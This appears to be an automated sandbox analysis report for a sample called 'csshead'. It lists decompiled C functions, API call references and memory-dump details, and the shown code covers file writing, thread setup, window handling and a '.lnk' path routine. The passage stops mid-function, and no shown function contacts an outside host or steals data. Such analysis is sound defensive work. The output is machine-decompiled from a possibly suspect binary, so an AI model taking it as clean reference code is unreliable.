C-Code - Quality: 100%

			E0040485C(CHAR* __eax, long __ecx, void* __edx) {
				CHAR* _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				_v24 = CreateFileA(_v8, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_v24 != 0xffffffff) {
					if(WriteFile(_v24, _v12, _v16,  &_v28, 0) != 0 && _v28 == _v16) {
						_v20 = 0xffffffff;
					}
					FlushFileBuffers(_v24);
					CloseHandle(_v24);
				}
				return _v20;
			}

0x00404862
0x00404865
0x00404868
0x0040486d
0x0040488c
0x00404893
0x004048af
0x004048b9
0x004048b9
0x004048c4
0x004048ce
0x004048ce
0x004048da

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
CloseHandle.KERNEL32(000000FF), ref: 004048CE

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00425E72, Relevance: 6.0, APIs: 4, Instructions: 45threadLIBRARYCODE

APIs

GetLastError.KERNEL32(?,00000000,004251BD,00422AA1,?,?,00417F96,00000009), ref: 00425E76

Part of subcall function 00425D30: TlsGetValue.KERNEL32(00000000,00425E89,?,?,00417F96,00000009), ref: 00425D39
Part of subcall function 00425D30: RtlDecodePointer.NTDLL ref: 00425D4B
Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425D5A

SetLastError.KERNEL32(00000000,?,?,00417F96,00000009), ref: 00425EE0

Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C

RtlDecodePointer.NTDLL(00000000), ref: 00425EB2
GetCurrentThreadId.KERNEL32 ref: 00425EC8

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(00436FF4,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041FC10, Relevance: 6.0, APIs: 4, Instructions: 45window

APIs

GetTopWindow.USER32 ref: 0041FC14
SendMessageA.USER32(00000000,?,?,?), ref: 0041FC38
GetTopWindow.USER32(00000000), ref: 0041FC43
GetWindow.USER32(00000000,00000002), ref: 0041FC65

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00425E72, Relevance: 6.0, APIs: 4, Instructions: 45
thread

C-Code - Quality: 69%

			E00425E72(void* __ebx, void* __fp0) {
				void* __edi;
				void* __esi;
				long _t3;
				void* _t9;
				long _t12;
				long _t19;
				long* _t20;

				_t3 = GetLastError();
				_push( *0x44204c);
				_t19 = _t3;
				_t20 =  *((intOrPtr*)(L00425D30()))();
				if(_t20 == 0) {
					_t20 = E0042A124(1, 0x214);
					if(_t20 != 0) {
						_t9 =  *((intOrPtr*)( *0x4331bc()))( *0x442c70,  *0x44204c, _t20);
						_t23 = _t9;
						if(_t9 == 0) {
							E00422804(_t20);
							_t20 = 0;
							__eflags = 0;
						} else {
							_push(0);
							_push(_t20);
							L00425DBE(__ebx, _t19, _t20, _t23, __fp0);
							_t12 = GetCurrentThreadId();
							_t20[1] = _t20[1] | 0xffffffff;
							 *_t20 = _t12;
						}
					}
				}
				SetLastError(_t19);
				return _t20;
			}

0x00425e76
0x00425e7c
0x00425e82
0x00425e8b
0x00425e8f
0x00425e9d
0x00425ea3
0x00425eb8
0x00425eba
0x00425ebc
0x00425ed7
0x00425edd
0x00425edd
0x00425ebe
0x00425ebe
0x00425ec0
0x00425ec1
0x00425ec8
0x00425ece
0x00425ed2
0x00425ed2
0x00425ebc
0x00425ea3
0x00425ee0
0x00425eea

APIs

GetLastError.KERNEL32(?,?,004251BD,004277BA,00000000), ref: 00425E76

Part of subcall function 00425D30: TlsGetValue.KERNEL32(?,00425E89), ref: 00425D39
Part of subcall function 00425D30: DecodePointer.KERNEL32 ref: 00425D4B
Part of subcall function 00425D30: TlsSetValue.KERNEL32(00000000), ref: 00425D5A

SetLastError.KERNEL32(00000000), ref: 00425EE0

Part of subcall function 0042A124: Sleep.KERNEL32(00000000,00000001,00000214), ref: 0042A14C

DecodePointer.KERNEL32(00000000), ref: 00425EB2
GetCurrentThreadId.KERNEL32 ref: 00425EC8

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC), ref: 0042282C

Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000), ref: 00425DCF
Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0041FDD0, Relevance: 6.0, APIs: 4, Instructions: 44string

APIs

lstrcpy.KERNEL32(?,?), ref: 0041FDE3
lstrlen.KERNEL32(004368C8,004368C8,?), ref: 0041FE22
wsprintfA.USER32 ref: 0041FE2D
SetWindowTextA.USER32(?,?), ref: 0041FE3F

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004171E0, Relevance: 6.0, APIs: 4, Instructions: 44
window

C-Code - Quality: 91%

			E004171E0(void* __ecx, intOrPtr* _a8, long* _a12) {
				long _t19;
				intOrPtr* _t25;
				void* _t33;

				_t25 = _a8;
				_t33 = __ecx;
				if( *_t25 ==  *((intOrPtr*)(__ecx + 4))) {
					if(GetFocus() !=  *(_t33 + 4)) {
						if(( *(_t33 + 0x58) & 0x00000004) != 0 &&  *((intOrPtr*)(_t33 + 0xac)) == 0) {
							 *((intOrPtr*)(_t33 + 0xac)) = GetFocus();
						}
						SetFocus( *(_t33 + 4));
					}
					_t19 = SendMessageA( *(_t33 + 4), 0x419,  *(_t25 + 0xc), 0);
					 *(_t33 + 0x84) =  *(_t33 + 0x84) & 0x000000cf;
					_push(1);
					L00416ED0(_t33, _t19);
					return 0;
				} else {
					 *_a12 = 0;
					return 1;
				}
			}

0x004171e1
0x004171e8
0x004171ed
0x0041720f
0x00417215
0x00417222
0x00417222
0x0041722c
0x0041722c
0x00417241
0x00417247
0x0041724e
0x00417253
0x0041725d
0x004171ef
0x004171f4
0x00417200
0x00417200

APIs

GetFocus.USER32 ref: 0041720A
GetFocus.USER32 ref: 00417220
SetFocus.USER32(?), ref: 0041722C
SendMessageA.USER32(?,00000419,?,00000000), ref: 00417241

Part of subcall function 00416ED0: SendMessageA.USER32 ref: 00416F08
Part of subcall function 00416ED0: MapWindowPoints.USER32(?,00000000,?,00000001), ref: 00416F2D
Part of subcall function 00416ED0: MapWindowPoints.USER32(?,00000000,0000041D,00000002), ref: 00416F3C
Part of subcall function 00416ED0: GetSubMenu.USER32(?,?), ref: 00416F7D
Part of subcall function 00416ED0: SendMessageA.USER32 ref: 00416FB0
Part of subcall function 00416ED0: SendMessageA.USER32(?,00000403,?,00000001), ref: 00416FC8
Part of subcall function 00416ED0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00416FD6
Part of subcall function 00416ED0: SendMessageA.USER32(?,00000403,?,00000000), ref: 00417026
Part of subcall function 00416ED0: GetFocus.USER32 ref: 0041702B
Part of subcall function 00416ED0: SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 0041703F
Part of subcall function 00416ED0: PeekMessageA.USER32(?,?,00000201,00000201,00000000), ref: 00417083
Part of subcall function 00416ED0: PtInRect.USER32(?,?,?), ref: 00417098
Part of subcall function 00416ED0: PeekMessageA.USER32(?,?,00000201,00000201,00000001), ref: 004170B7
Part of subcall function 00416ED0: EnterCriticalSection.KERNEL32(-00000010,?,?,?,?,?,?,00000417,?,?), ref: 004170DB
Part of subcall function 00416ED0: RegisterWindowMessageA.USER32(WTL_CmdBar_InternalAutoPopupMsg,?,?,?,?,?,?,00000417,?,?), ref: 004170EF
Part of subcall function 00416ED0: LeaveCriticalSection.KERNEL32(-00000010,?,?,?,?,?,?,00000417,?,?), ref: 004170FB
Part of subcall function 00416ED0: PostMessageA.USER32(?,00000000,?,00000000), ref: 0041711C
Part of subcall function 00416ED0: PostMessageA.USER32(?,00000100,00000028,00000000), ref: 00417140
Part of subcall function 00416ED0: SendMessageA.USER32(?,00000448,?,00000000), ref: 00417195
Part of subcall function 00416ED0: SendMessageA.USER32(?,00000449,00000001,00000000), ref: 004171A4

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0041E9C0, Relevance: 6.0, APIs: 4, Instructions: 44

C-Code - Quality: 100%

			E0041E9C0(void* __ecx, struct HWND__* _a4) {
				int _t10;
				void* _t25;

				_t18 = _a4;
				_t25 = __ecx;
				_t10 = IsWindow(_a4);
				if(_t10 != 0) {
					if(IsWindow( *(_t25 + 0xc0)) != 0 &&  *((intOrPtr*)(_t25 + 0xd0)) == GetWindowLongA( *(_t25 + 0xc0), 0xfffffffc) && SetWindowLongA( *(_t25 + 0xc0), 0xfffffffc,  *(_t25 + 0xd8)) != 0) {
						 *(_t25 + 0xd8) =  *0x4334dc;
						 *(_t25 + 0xc0) = 0;
					}
					return E004124F0(_t25 + 0xc0, _t18);
				} else {
					return _t10;
				}
			}

0x0041e9c1
0x0041e9ce
0x0041e9d0
0x0041e9d4
0x0041e9e7
0x0041ea22
0x0041ea28
0x0041ea28
0x0041ea41
0x0041e9d9
0x0041e9d9
0x0041e9d9

APIs

IsWindow.USER32(0000E900), ref: 0041E9D0
IsWindow.USER32(?), ref: 0041E9E3
GetWindowLongA.USER32(?,000000FC), ref: 0041E9F8
SetWindowLongA.USER32(?,000000FC,?), ref: 0041EA12

Part of subcall function 004124F0: GetCurrentProcess.KERNEL32 ref: 00412525
Part of subcall function 004124F0: FlushInstructionCache.KERNEL32(00000000), ref: 0041252C
Part of subcall function 004124F0: SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041253E

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0041FD50, Relevance: 6.0, APIs: 4, Instructions: 42string

APIs

lstrcpy.KERNEL32(?), ref: 0041FD88
lstrlen.KERNEL32(?,004368C8,?), ref: 0041FDA0
wsprintfA.USER32 ref: 0041FDAB
SetWindowTextA.USER32(?,?), ref: 0041FDBD

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004046A0, Relevance: 6.0, APIs: 4, Instructions: 39
windowthread

C-Code - Quality: 100%

			E004046A0(void* __ecx) {
				void* _t22;

				_t22 = __ecx;
				do {
					WaitForSingleObject( *(_t22 + 0x3c), 0xffffffff);
					do {
						 *((char*)(_t22 + 0x40)) = 0;
					} while (WaitForSingleObject( *(_t22 + 0x3c),  *(_t22 + 0x44)) == 0);
				} while ( *((intOrPtr*)(_t22 + 0x40)) != 0 ||  *((intOrPtr*)(_t22 + 8)) != 0);
				if(CloseHandle( *(_t22 + 0x3c)) != 0) {
					 *(_t22 + 0x3c) = 0;
				}
				return PostThreadMessageA( *(_t22 + 0x30), 0x12, 0, 0);
			}

0x004046a9
0x004046b0
0x004046b6
0x004046b8
0x004046c0
0x004046c5
0x004046c9
0x004046df
0x004046e1
0x004046e1
0x004046f5

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 004046B6
WaitForSingleObject.KERNEL32(?,?), ref: 004046C3
CloseHandle.KERNEL32(?), ref: 004046D7
PostThreadMessageA.USER32(?,00000012,00000000,00000000), ref: 004046EC

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00410AE0, Relevance: 6.0, APIs: 4, Instructions: 36library

APIs

LoadLibraryA.KERNEL32(?), ref: 00410AE6
GetProcAddress.KERNEL32(00000000,00436270), ref: 00410B11
FreeLibrary.KERNEL32(00000000), ref: 00410B21
FreeLibrary.KERNEL32(00000000), ref: 00410B32

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0040CED0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 401

C-Code - Quality: 85%

			E0040CED0(intOrPtr* __ecx, RECT* _a4) {
				char _v12;
				RECT* _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				RECT* _v48;
				RECT* _v56;
				intOrPtr _v60;
				intOrPtr* _v72;
				char _v76;
				RECT* _v92;
				intOrPtr* _v104;
				RECT* _t104;
				intOrPtr* _t107;
				intOrPtr* _t113;
				RECT* _t116;
				intOrPtr* _t119;
				RECT* _t120;
				RECT* _t123;
				intOrPtr* _t125;
				RECT* _t130;
				RECT* _t132;
				intOrPtr* _t138;
				intOrPtr* _t142;
				RECT* _t150;
				RECT* _t152;
				intOrPtr* _t155;
				RECT* _t156;
				intOrPtr* _t159;
				RECT* _t163;
				intOrPtr* _t166;
				RECT* _t167;
				intOrPtr* _t170;
				RECT* _t171;
				RECT* _t172;
				RECT* _t175;
				intOrPtr* _t180;
				RECT* _t186;
				intOrPtr* _t189;
				intOrPtr* _t195;
				void* _t199;
				RECT* _t200;
				struct tagRECT* _t202;
				intOrPtr* _t203;
				void* _t204;
				char _t205;
				intOrPtr _t244;
				void* _t293;
				RECT** _t294;
				RECT* _t297;
				intOrPtr* _t298;
				RECT* _t299;
				RECT** _t301;
				intOrPtr* _t302;
				intOrPtr* _t303;
				intOrPtr* _t304;

				_t299 = _a4;
				_t298 = __ecx;
				if(_t299 != 0) {
					if( *((intOrPtr*)(__ecx + 0x60)) != _t299) {
						 *((intOrPtr*)( *((intOrPtr*)(_t299->left + 4))))(_t299);
						_t195 =  *((intOrPtr*)(__ecx + 0x60));
						if(_t195 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t195 + 8))))(_t195);
						}
						 *(_t298 + 0x60) = _t299;
					}
					_t294 = _t298 + 0x64;
					_t200 = 0;
					 *((intOrPtr*)( *(_t299->left)))(_t299, 0x435ef0, _t294, _t293, _t199);
					_t104 =  *_t294;
					if(_t104 == 0) {
						L55:
						_v16 = 0;
						 *((intOrPtr*)( *( *_t299)))(_t299, 0x435e04,  &_v16);
						_t107 = _v28;
						if(_t107 != 0) {
							_t99 =  *_t298 + 0x10; // 0x122
							 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 0xc))))(_t107,  *((intOrPtr*)( *_t99))());
							_t113 = _v36;
							goto L57;
						}
					} else {
						_t301 = _t298 + 0xa0;
						 *((intOrPtr*)( *((intOrPtr*)(_t104->left + 0x58))))(_t104, 1, _t301);
						if(( *_t301 & 0x00020000) != 0) {
							_t186 =  *_t294;
							 *((intOrPtr*)( *((intOrPtr*)(_t186->left + 0xc))))(_t186, _v32);
							_t189 = _v40;
							if(_t189 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t189 + 8))))(_t189);
							}
						}
						if(_v16 != _t200) {
							L32:
							if(( *_t301 & 0x00020000) == 0) {
								_t155 =  *((intOrPtr*)( *((intOrPtr*)( *_t298 + 0x10))))();
								_v16 = 0;
								if(_t155 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t155))))(_t155, 0x435dc4,  &_v16);
								}
								_t156 =  *_t294;
								 *((intOrPtr*)( *((intOrPtr*)(_t156->left + 0xc))))(_t156, _v16);
								_t159 = _v24;
								if(_t159 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t159 + 8))))(_t159);
								}
							}
							_t116 =  *_t294;
							_t302 = _t298 + 0x70;
							 *(_t298 + 0x90) = 0;
							_t200 =  *((intOrPtr*)( *(_t116->left)))(_t116, 0x435ee0, _t302);
							if(_t200 >= 0) {
								 *(_t298 + 0x90) = 7;
							} else {
								_t150 =  *_t294;
								_t200 =  *((intOrPtr*)( *(_t150->left)))(_t150, 0x435ed0, _t302);
								if(_t200 < 0) {
									_t152 =  *_t294;
									_t200 =  *((intOrPtr*)( *(_t152->left)))(_t152, 0x435ec0, _t302);
									if(_t200 >= 0) {
										 *(_t298 + 0x90) = 1;
									}
								} else {
									 *(_t298 + 0x90) = 3;
								}
							}
							_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t298 + 0x10))))();
							_v48 = 0;
							if(_t119 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t119))))(_t119, 0x435e54,  &_v48);
							}
							_t120 =  *_t294;
							 *((intOrPtr*)( *((intOrPtr*)(_t120->left + 0x4c))))(_t120, _v48, _t298 + 0x9c);
							_t303 =  *_t302;
							if(_t303 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t303 + 0x1c))))(_t303, 1, 0, _v60);
							}
							_t123 =  *_t294;
							 *((intOrPtr*)( *((intOrPtr*)(_t123->left + 0x14))))(_t123, L"AXWIN", 0);
							if(( *(_t298 + 0xa0) & 0x00000400) == 0) {
								_t202 = _t298 + 0xb4;
								GetClientRect( *(_t298 + 4), _t202);
								_t203 = _t298 + 0xa4;
								_t304 = _t298 + 0xac;
								 *_t304 =  *((intOrPtr*)(_t298 + 0xbc)) - _t202->left;
								 *((intOrPtr*)(_t298 + 0xb0)) =  *((intOrPtr*)(_t298 + 0xc0)) -  *((intOrPtr*)(_t298 + 0xb8));
								E0040A4A0(_t304, _t203);
								_t130 =  *_t294;
								 *((intOrPtr*)( *((intOrPtr*)(_t130->left + 0x44))))(_t130, 1, _t203);
								_t132 =  *_t294;
								 *((intOrPtr*)( *((intOrPtr*)(_t132->left + 0x48))))(_t132, 1, _t203);
								L0040A420(_t203, _t304);
								_t204 = _t298 + 0xb4;
								 *((intOrPtr*)(_t298 + 0xbc)) =  *(_t298 + 0xb4) +  *_t304;
								 *((intOrPtr*)(_t298 + 0xc0)) =  *((intOrPtr*)(_t298 + 0xb8)) +  *((intOrPtr*)(_t298 + 0xb0));
								_t138 =  *((intOrPtr*)( *((intOrPtr*)( *_t298 + 0x10))))();
								_v92 = 0;
								if(_t138 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t138))))(_t138, 0x435dc4,  &_v76);
								}
								_t297 =  *_t294;
								_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t297->left + 0x2c))))(_t297, 0xfffffffb, 0, _v76, 0,  *(_t298 + 4), _t204);
								RedrawWindow( *(_t298 + 4), 0, 0, 0x507);
								_t142 = _v104;
								if(_t142 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t142 + 8))))(_t142);
								}
							}
							_t125 = _v72;
							if(_t125 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t125 + 8))))(_t125);
							}
							_t299 = _v56;
							goto L55;
						} else {
							_t163 =  *_t294;
							_v16 = _t200;
							if(_t163 == 0) {
								L18:
								_t205 = _v12;
								if(_t205 == 0) {
									goto L32;
								} else {
									L0040B2C0( &_v12,  *_t294);
									_t166 = _v16;
									if(_t166 == 0) {
										goto L30;
									} else {
										_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x14))))(_t166, _t205);
										_t170 = _v20;
										if(_t170 != 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *_t170 + 8))))(_t170);
										}
										goto L22;
									}
								}
							} else {
								 *((intOrPtr*)( *(_t163->left)))(_t163, 0x435dd4,  &_v16);
								_t180 = _v28;
								if(_t180 == 0) {
									goto L18;
								} else {
									_t244 = _v24;
									if(_t244 == 0) {
										_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_t180 + 0x20))))(_t180);
									} else {
										_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_t180 + 0x14))))(_t180, _t244);
									}
									L22:
									if(_t200 >= 0) {
										L30:
										_t167 = _v16;
										if(_t167 != 0) {
											 *((intOrPtr*)( *((intOrPtr*)(_t167->left + 8))))(_t167);
										}
										goto L32;
									} else {
										if(( *_t301 & 0x00020000) != 0) {
											_t175 =  *_t294;
											 *((intOrPtr*)( *((intOrPtr*)(_t175->left + 0xc))))(_t175, 0);
										}
										 *_t301 = 0;
										_t171 =  *_t294;
										if(_t171 != 0) {
											 *_t294 = 0;
											 *((intOrPtr*)( *((intOrPtr*)(_t171->left + 8))))(_t171);
										}
										_t172 =  *(_t298 + 0x60);
										if(_t172 != 0) {
											 *(_t298 + 0x60) = 0;
											 *((intOrPtr*)( *((intOrPtr*)(_t172->left + 8))))(_t172);
										}
										_t113 = _v24;
										L57:
										if(_t113 != 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *_t113 + 8))))(_t113);
										}
									}
								}
							}
						}
					}
					return _t200;
				} else {
					return 0;
				}
			}

0x0040ced4
0x0040ced9
0x0040cedd
0x0040ceec
0x0040cef5
0x0040cef7
0x0040cefc
0x0040cf04
0x0040cf04
0x0040cf06
0x0040cf06
0x0040cf10
0x0040cf1a
0x0040cf1c
0x0040cf1e
0x0040cf22
0x0040d2a3
0x0040d2b3
0x0040d2bb
0x0040d2bd
0x0040d2c3
0x0040d2cb
0x0040d2d7
0x0040d2d9
0x00000000
0x0040d2d9
0x0040cf28
0x0040cf2d
0x0040cf37
0x0040cf40
0x0040cf64
0x0040cf71
0x0040cf73
0x0040cf79
0x0040cf81
0x0040cf81
0x0040cf79
0x0040cf87
0x0040d06f
0x0040d076
0x0040d07f
0x0040d081
0x0040d08b
0x0040d09c
0x0040d09c
0x0040d09e
0x0040d0ab
0x0040d0ad
0x0040d0b3
0x0040d0bb
0x0040d0bb
0x0040d0b3
0x0040d0bd
0x0040d0bf
0x0040d0c3
0x0040d0d9
0x0040d0dd
0x0040d100
0x0040d0df
0x0040d0df
0x0040d0ee
0x0040d0f2
0x0040d10c
0x0040d11b
0x0040d11f
0x0040d121
0x0040d121
0x0040d0f4
0x0040d0f4
0x0040d0f4
0x0040d0f2
0x0040d132
0x0040d134
0x0040d13e
0x0040d14f
0x0040d14f
0x0040d151
0x0040d165
0x0040d167
0x0040d16c
0x0040d17e
0x0040d17e
0x0040d180
0x0040d18f
0x0040d19b
0x0040d1a4
0x0040d1ac
0x0040d1c6
0x0040d1cc
0x0040d1d4
0x0040d1d7
0x0040d1dd
0x0040d1e2
0x0040d1ed
0x0040d1ef
0x0040d1fa
0x0040d1fe
0x0040d21a
0x0040d220
0x0040d229
0x0040d231
0x0040d233
0x0040d23d
0x0040d24e
0x0040d24e
0x0040d257
0x0040d277
0x0040d279
0x0040d27f
0x0040d285
0x0040d28d
0x0040d28d
0x0040d285
0x0040d28f
0x0040d295
0x0040d29d
0x0040d29d
0x0040d29f
0x00000000
0x0040cf8d
0x0040cf8d
0x0040cf8f
0x0040cf95
0x0040cfd1
0x0040cfd1
0x0040cfd7
0x00000000
0x0040cfdd
0x0040cfe4
0x0040cfe9
0x0040cfef
0x00000000
0x0040cff1
0x0040cffa
0x0040cffc
0x0040d002
0x0040d00a
0x0040d00a
0x00000000
0x0040d002
0x0040cfef
0x0040cf97
0x0040cfa6
0x0040cfa8
0x0040cfae
0x00000000
0x0040cfb0
0x0040cfb0
0x0040cfb6
0x0040cfcd
0x0040cfb8
0x0040cfc1
0x0040cfc1
0x0040d00c
0x0040d00e
0x0040d05f
0x0040d05f
0x0040d065
0x0040d06d
0x0040d06d
0x00000000
0x0040d010
0x0040d017
0x0040d019
0x0040d023
0x0040d023
0x0040d025
0x0040d02c
0x0040d030
0x0040d032
0x0040d03e
0x0040d03e
0x0040d040
0x0040d045
0x0040d047
0x0040d054
0x0040d054
0x0040d056
0x0040d2dd
0x0040d2df
0x0040d2e7
0x0040d2e7
0x0040d2df
0x0040d00e
0x0040cfae
0x0040cf95
0x0040cf87
0x0040d2f2
0x0040cee0
0x0040cee6
0x0040cee6

APIs

GetClientRect.USER32(?,?), ref: 0040D1AC

Part of subcall function 0040A4A0: GetDC.USER32(00000000), ref: 0040A4CA
Part of subcall function 0040A4A0: GetDeviceCaps.GDI32(00000000,00000058), ref: 0040A4DB
Part of subcall function 0040A4A0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040A4E4
Part of subcall function 0040A4A0: ReleaseDC.USER32(00000000,00000000), ref: 0040A4EB
Part of subcall function 0040A4A0: MulDiv.KERNEL32(000009EC,?,?), ref: 0040A504
Part of subcall function 0040A4A0: MulDiv.KERNEL32(000009EC,?,00000000), ref: 0040A512

Part of subcall function 0040A420: GetDC.USER32(00000000), ref: 0040A44A
Part of subcall function 0040A420: GetDeviceCaps.GDI32(00000000,00000058), ref: 0040A45B
Part of subcall function 0040A420: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040A464
Part of subcall function 0040A420: ReleaseDC.USER32(00000000,00000000), ref: 0040A46B
Part of subcall function 0040A420: MulDiv.KERNEL32(?,00000000,000009EC), ref: 0040A484
Part of subcall function 0040A420: MulDiv.KERNEL32(00000000,?,000009EC), ref: 0040A492

RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 0040D279

Strings

AXWIN, xrefs: 0040D189

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 004076A0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146

C-Code - Quality: 93%

			E004076A0(int __eax, void* __ebx) {
				int _v8;
				char* _v12;
				char* _v16;
				char _v273;
				char _v530;
				void* __ebp;
				int _t38;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				intOrPtr _t92;
				long _t97;
				long _t99;
				long _t100;
				intOrPtr _t102;
				void* _t104;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t113;

				_t38 = __eax;
				_v8 = __eax;
				if( *0x40b514 > 0 &&  *0x40b510 != 0) {
					E00401308( &_v530, 0x40b518);
					 *((char*)(_t111 + E004012DC(0x40b518) - 0x212)) = 0;
					E0040133C( &_v530, ".lnk");
					_t113 = _t112 + 8;
					_t96 =  &_v530;
					_t102 =  *0x40a0ac; // 0x401c58
					_t46 = E00403FC8(0x40b518, __ebx,  &_v530, _t102);
					asm("sbb eax, eax");
					if( ~( ~_t46) == 0) {
						E00401308( &_v530, 0x4078ec);
						E0040133C( &_v530, 0x40b518);
						E0040133C( &_v530, 0x4078f0);
						_t92 =  *0x40a0ac; // 0x401c58
						E0040133C( &_v530, _t92);
						_t113 = _t113 + 0x18;
					}
